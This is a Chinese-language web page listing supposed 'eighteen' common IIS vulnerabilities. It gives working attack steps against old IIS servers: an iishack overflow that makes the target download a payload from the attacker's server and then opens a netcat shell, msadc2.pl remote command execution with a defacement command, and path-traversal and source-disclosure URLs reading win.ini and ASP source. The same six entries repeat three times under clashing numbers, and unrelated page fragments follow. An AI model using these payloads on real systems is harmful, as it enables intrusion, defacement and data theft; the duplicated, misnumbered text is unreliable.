IIS中常见的十八个安全漏洞

iis|安全|安全漏洞

  1. iis4hack缓冲溢出

  主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器:

  c:>iishack.exe 80 /ncx.exe

  然后你就使用netcat来连接你要检测的服务器:

  c:>nc 80

  如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip

  2.msadc

  IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help

  [quack@chat quack]$ perl msadc2.pl -h

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Usage: msadc.pl -h { -d -X -v }

  -h = host you want to scan (ip or domain)

  -d = delay between calls, default 1 second

  -X = dump Index Server path table, if available

  -N = query VbBusObj for NetBIOS name

  -V = use VbBusObj instead of ActiveDataFactory

  -v = verbose

  -e = external dictionary file for step 5

  -u <\hostsharefile> = use UNC file

  -w = Windows 95 instead of Windows NT

  -c = v1 compatibility (three step query)

  -s = run only step

  Or a -R will resume a (v2) command session

  [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Type the command line you want to run (cmd /c assumed):

  cmd /c

  如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:

  echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

  3.Codebrws.asp

  察看文件源代码

  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

  4.Showcode.asp

  察看文件源代码

  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

  5.Null.htw

  察看文件源代码

  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

  6.webhits.dll & .htw

  hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:

  http://www.victim.com/nosuchfile.htw 如果你从服务器端获得如下信息:

  format of the QUERY_STRING is invalid这就表示你存在这个漏洞 .这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消

  这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序:

  /iissamples/issamples/oop/qfullhit.htw

  /iissamples/issamples/oop/qsumrhit.htw

  /isssamples/exair/search/qfullhit.htw

  /isssamples/exair/search/qsumrhit.htw

  /isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)

  一个攻击者可以使用如下的方法来访问系统中文件的内容:

  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

  就会在有此漏洞系统中win.ini文件的内容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的内容,你可以请求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代码

  7. iis4hack缓冲溢出

  主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器:

  c:>iishack.exe 80 /ncx.exe

  然后你就使用netcat来连接你要检测的服务器:

  c:>nc 80

  如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip

  8.msadc

  IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help

  [quack@chat quack]$ perl msadc2.pl -h

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Usage: msadc.pl -h { -d -X -v }

  -h = host you want to scan (ip or domain)

  -d = delay between calls, default 1 second

  -X = dump Index Server path table, if available

  -N = query VbBusObj for NetBIOS name

  -V = use VbBusObj instead of ActiveDataFactory

  -v = verbose

  -e = external dictionary file for step 5

  -u <\hostsharefile> = use UNC file

  -w = Windows 95 instead of Windows NT

  -c = v1 compatibility (three step query)

  -s = run only step

  Or a -R will resume a (v2) command session

  [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Type the command line you want to run (cmd /c assumed):

  cmd /c

  如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:

  echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

  9.Codebrws.asp

  察看文件源代码

  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

  10.Showcode.asp

  察看文件源代码

  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

  11.Null.htw

  察看文件源代码

  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

  12.webhits.dll & .htw

  hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:

  http://www.victim.com/nosuchfile.htw 如果你从服务器端获得如下信息:

  format of the QUERY_STRING is invalid这就表示你存在这个漏洞 .这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消

  这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序:

  /iissamples/issamples/oop/qfullhit.htw

  /iissamples/issamples/oop/qsumrhit.htw

  /isssamples/exair/search/qfullhit.htw

  /isssamples/exair/search/qsumrhit.htw

  /isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)

  一个攻击者可以使用如下的方法来访问系统中文件的内容:

  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

  就会在有此漏洞系统中win.ini文件的内容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的内容,你可以请求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代码

  13. iis4hack缓冲溢出

  主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点www.technotronic.com去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器:

  c:>iishack.exe 80 /ncx.exe

  然后你就使用netcat来连接你要检测的服务器:

  c:>nc 80

  如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip

  14.msadc

  IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help

  [quack@chat quack]$ perl msadc2.pl -h

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Usage: msadc.pl -h { -d -X -v }

  -h = host you want to scan (ip or domain)

  -d = delay between calls, default 1 second

  -X = dump Index Server path table, if available

  -N = query VbBusObj for NetBIOS name

  -V = use VbBusObj instead of ActiveDataFactory

  -v = verbose

  -e = external dictionary file for step 5

  -u <\hostsharefile> = use UNC file

  -w = Windows 95 instead of Windows NT

  -c = v1 compatibility (three step query)

  -s = run only step

  Or a -R will resume a (v2) command session

  [quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --

  Type the command line you want to run (cmd /c assumed):

  cmd /c

  如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:

  echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

  15.Codebrws.asp

  察看文件源代码

  http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

  16.Showcode.asp

  察看文件源代码

  http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

  17.Null.htw

  察看文件源代码

  http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

  18.webhits.dll & .htw

  hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目:

  http://www.victim.com/nosuchfile.htw 如果你从服务器端获得如下信息:

  format of the QUERY_STRING is invalid这就表示你存在这个漏洞 .这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消

  这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序:

  /iissamples/issamples/oop/qfullhit.htw

  /iissamples/issamples/oop/qsumrhit.htw

  /isssamples/exair/search/qfullhit.htw

  /isssamples/exair/search/qsumrhit.htw

  /isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)

  一个攻击者可以使用如下的方法来访问系统中文件的内容:

  http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

  ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

  就会在有此漏洞系统中win.ini文件的内容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的内容,你可以请求如下的URL:http://www.victim.com/default.asp::$DATA你就得到了源代码

时间: 2024-09-19 20:35:53

IIS中常见的十八个安全漏洞的相关文章

营销活动中常见的十大错误现象

在芝加哥举行的SES大会上,我有幸在http://www.aliyun.com/zixun/aggregation/18519.html">小组讨论会上发言,表达自己对当前搜索市场现状的看法.在讨论期间,有许多问题围绕搜索重新定向问题.搜索广告新模式以及搜索和社交媒体之间的互动关系等. 我谈到了一个普通的主题,这也是我们许多营销商在进行营销活动是所忽视的一个基本问题,从而导致了机会的错失.在小组讨论会上的同行David Pann,也是雅虎公司搜索业务副总裁,对此也有相同的看法.他指出,广告

SEO培训中常见的十四个问题及答案

中介交易 SEO诊断 淘宝客 云主机 技术大厅 比较常见的seo问题整理一下.希望大家不要再次提重复问题. 部分问题以"百度"为代表,答复在雅虎和google和其他引擎同样有效. 问答集纯属个人意见.限于时间和篇幅关系,所以问题只做概论,细节问题未做答复.仅供参考. 1. 常见问题:我的网站是http://www.****.com 谁帮我优化一下? 类似问题:我网站要做****关键字,应该怎么优化才能到第*页呢? 参考回答:对不起!太笼统的话题,一般大家都不会去答复.请自己参考seo资

在ASP.NET 2.0中操作数据之三十八:处理BLL和DAL的异常_自学过程

导言 在DataList里编辑和删除数据概述里,我们创建了一个提供简单编辑和删除功能的DataList.虽然功能上已经完整了,但是对用户来说是不友好的.因为所有在编辑和删除过程中产生的异常都是未处理的.比如,遗漏了输入product的name,或者编辑product时在price里输入"Very affordable!",都会抛出异常.而由于在代码里未捕捉这些异常,页面会显示ASP.NET运行时的详细错误信息. 如我们在在ASP.NET页面中处理BLL/DAL层的异常里看到的,如果BL

在ASP.NET 2.0中操作数据之十八:在ASP.NET页面中处理BLL/DAL层的异常_自学过程

导言 在一个使用了分层体系架构的ASP.NET web应用系统里处理数据,一般遵循以下几步: 1.确定业务逻辑层需要调用哪个方法,并且需要出入哪些参数.这些参数可以通过硬编码设置,程序自动设定,或者由用户输入. 2.调用此方法. 3.处理结果.当调用一个返回数据的BLL方法时,这包括绑定数据到Data Web服务器控件.而对于修改数据的BLL方法而言,这包括基于返回值的基础上执行某些动作,或者适当地处理在第二步中引发的异常. 正如我们在前一节里看到的,无论ObjectDataSource控件还是

在ASP.NET 2.0中操作数据之五十八:在程序启动阶段缓存数据_自学过程

导言: 前面2章考察了在表现层和缓存层缓存数据.在第56章,我们探讨了在表现层设置ObjectDataSource的相关cache属性来缓存数据.在第57章,我们探讨了创建一个单独的分开的缓存层.这2章都是采用"应激装载"(reactive loading)的模式来缓存数据.该模式下,每次请求数据时,系统先检查其是否在内存,如果没有,则从数据源--比如数据库,来获取数据,然后将其存储在内存里.该模式的优势在于执行起来很容易:而缺点之一在于应"请求"(requests

在ASP.NET 2.0中操作数据之六十八:为DataTable添加额外的列_自学过程

导言: 当向类型化的数据集(Typed DataSet)添加一个TableAdapter时,相应的DataTable的构架已经由TableAdapter的主查询定义好了.比如,如果主查询返回A, B,C这3个域,那么 DataTable将有对应的3个列A, B,和C.除了主查询以外,TableAdapter还可以包含其他的查询,可能是返回基于某些参数的数据.比如,ProductsTableAdapter的主查询返回所有产品的信息,此外,ProductsTableAdapter还包含诸如GetPr

IIS中Http.sys处理Range整数溢出漏洞及修复建议

 一.漏洞概要 2015年04月14日,微软发布严重级别的安全公告 MS15-034,编号为 CVE-2015-1635,据称在 Http.sys  中的漏洞可能允许远程执行代码.      漏洞描述 Http.sys 是一个位于 Windows 操作系统核心组件,能够让任何应用程序通过它提供的接口,以 Http 协议进行信息通讯.微软在 Windows 2003 Server 里引进了新的 HTTP API 和内核模式驱动 Http.sys,目的是使基于 Http 服务的程序更有效率.其实在

AIX LVM基本概念理解及十八个典型问题

 对于AIX系统工程师来说,LVM是无论如何都无法避免的区域,VG镜像.存储迁移.IO调优,存储故障处理各个方面都有LVM的影子.每当我们在这些方面遇到难题时,其实都是直接或间接的和LVM战斗. 以下是一些LVM知识.常见问题及其解决方法和注意事项,掌握这些内容,必将提高你的LVM战斗力! 1. 基本概念 LVM内置在AIX系统中,随着AIX版本的更新而更新.不管是功能性还是扩展性都在逐步发展.我们在日常的工作中,一定结合自己的实际情况做好规划再使用,避免由于LVM本身的限制带来后期维护和扩展的

学习CSS优化的十八项技巧

css|技巧|优化 一.使用css缩写 使用缩写可以帮助减少你CSS文件的大小,更加容易阅读.css缩写的主要规则请参看<常用css缩写语法总结>,这里就不展开描述. 二.明确定义单位,除非值为0 忘记定义尺寸的单位是CSS新手普遍的错误.在HTML中你可以只写width=100,但是在CSS中,你必须给一个准确的单位,比如:width:100px width:100em.只有两个例外情况可以不定义单位:行高和0值.除此以外,其他值都必须紧跟单位,注意,不要在数值和单位之间加空格. 三.区分大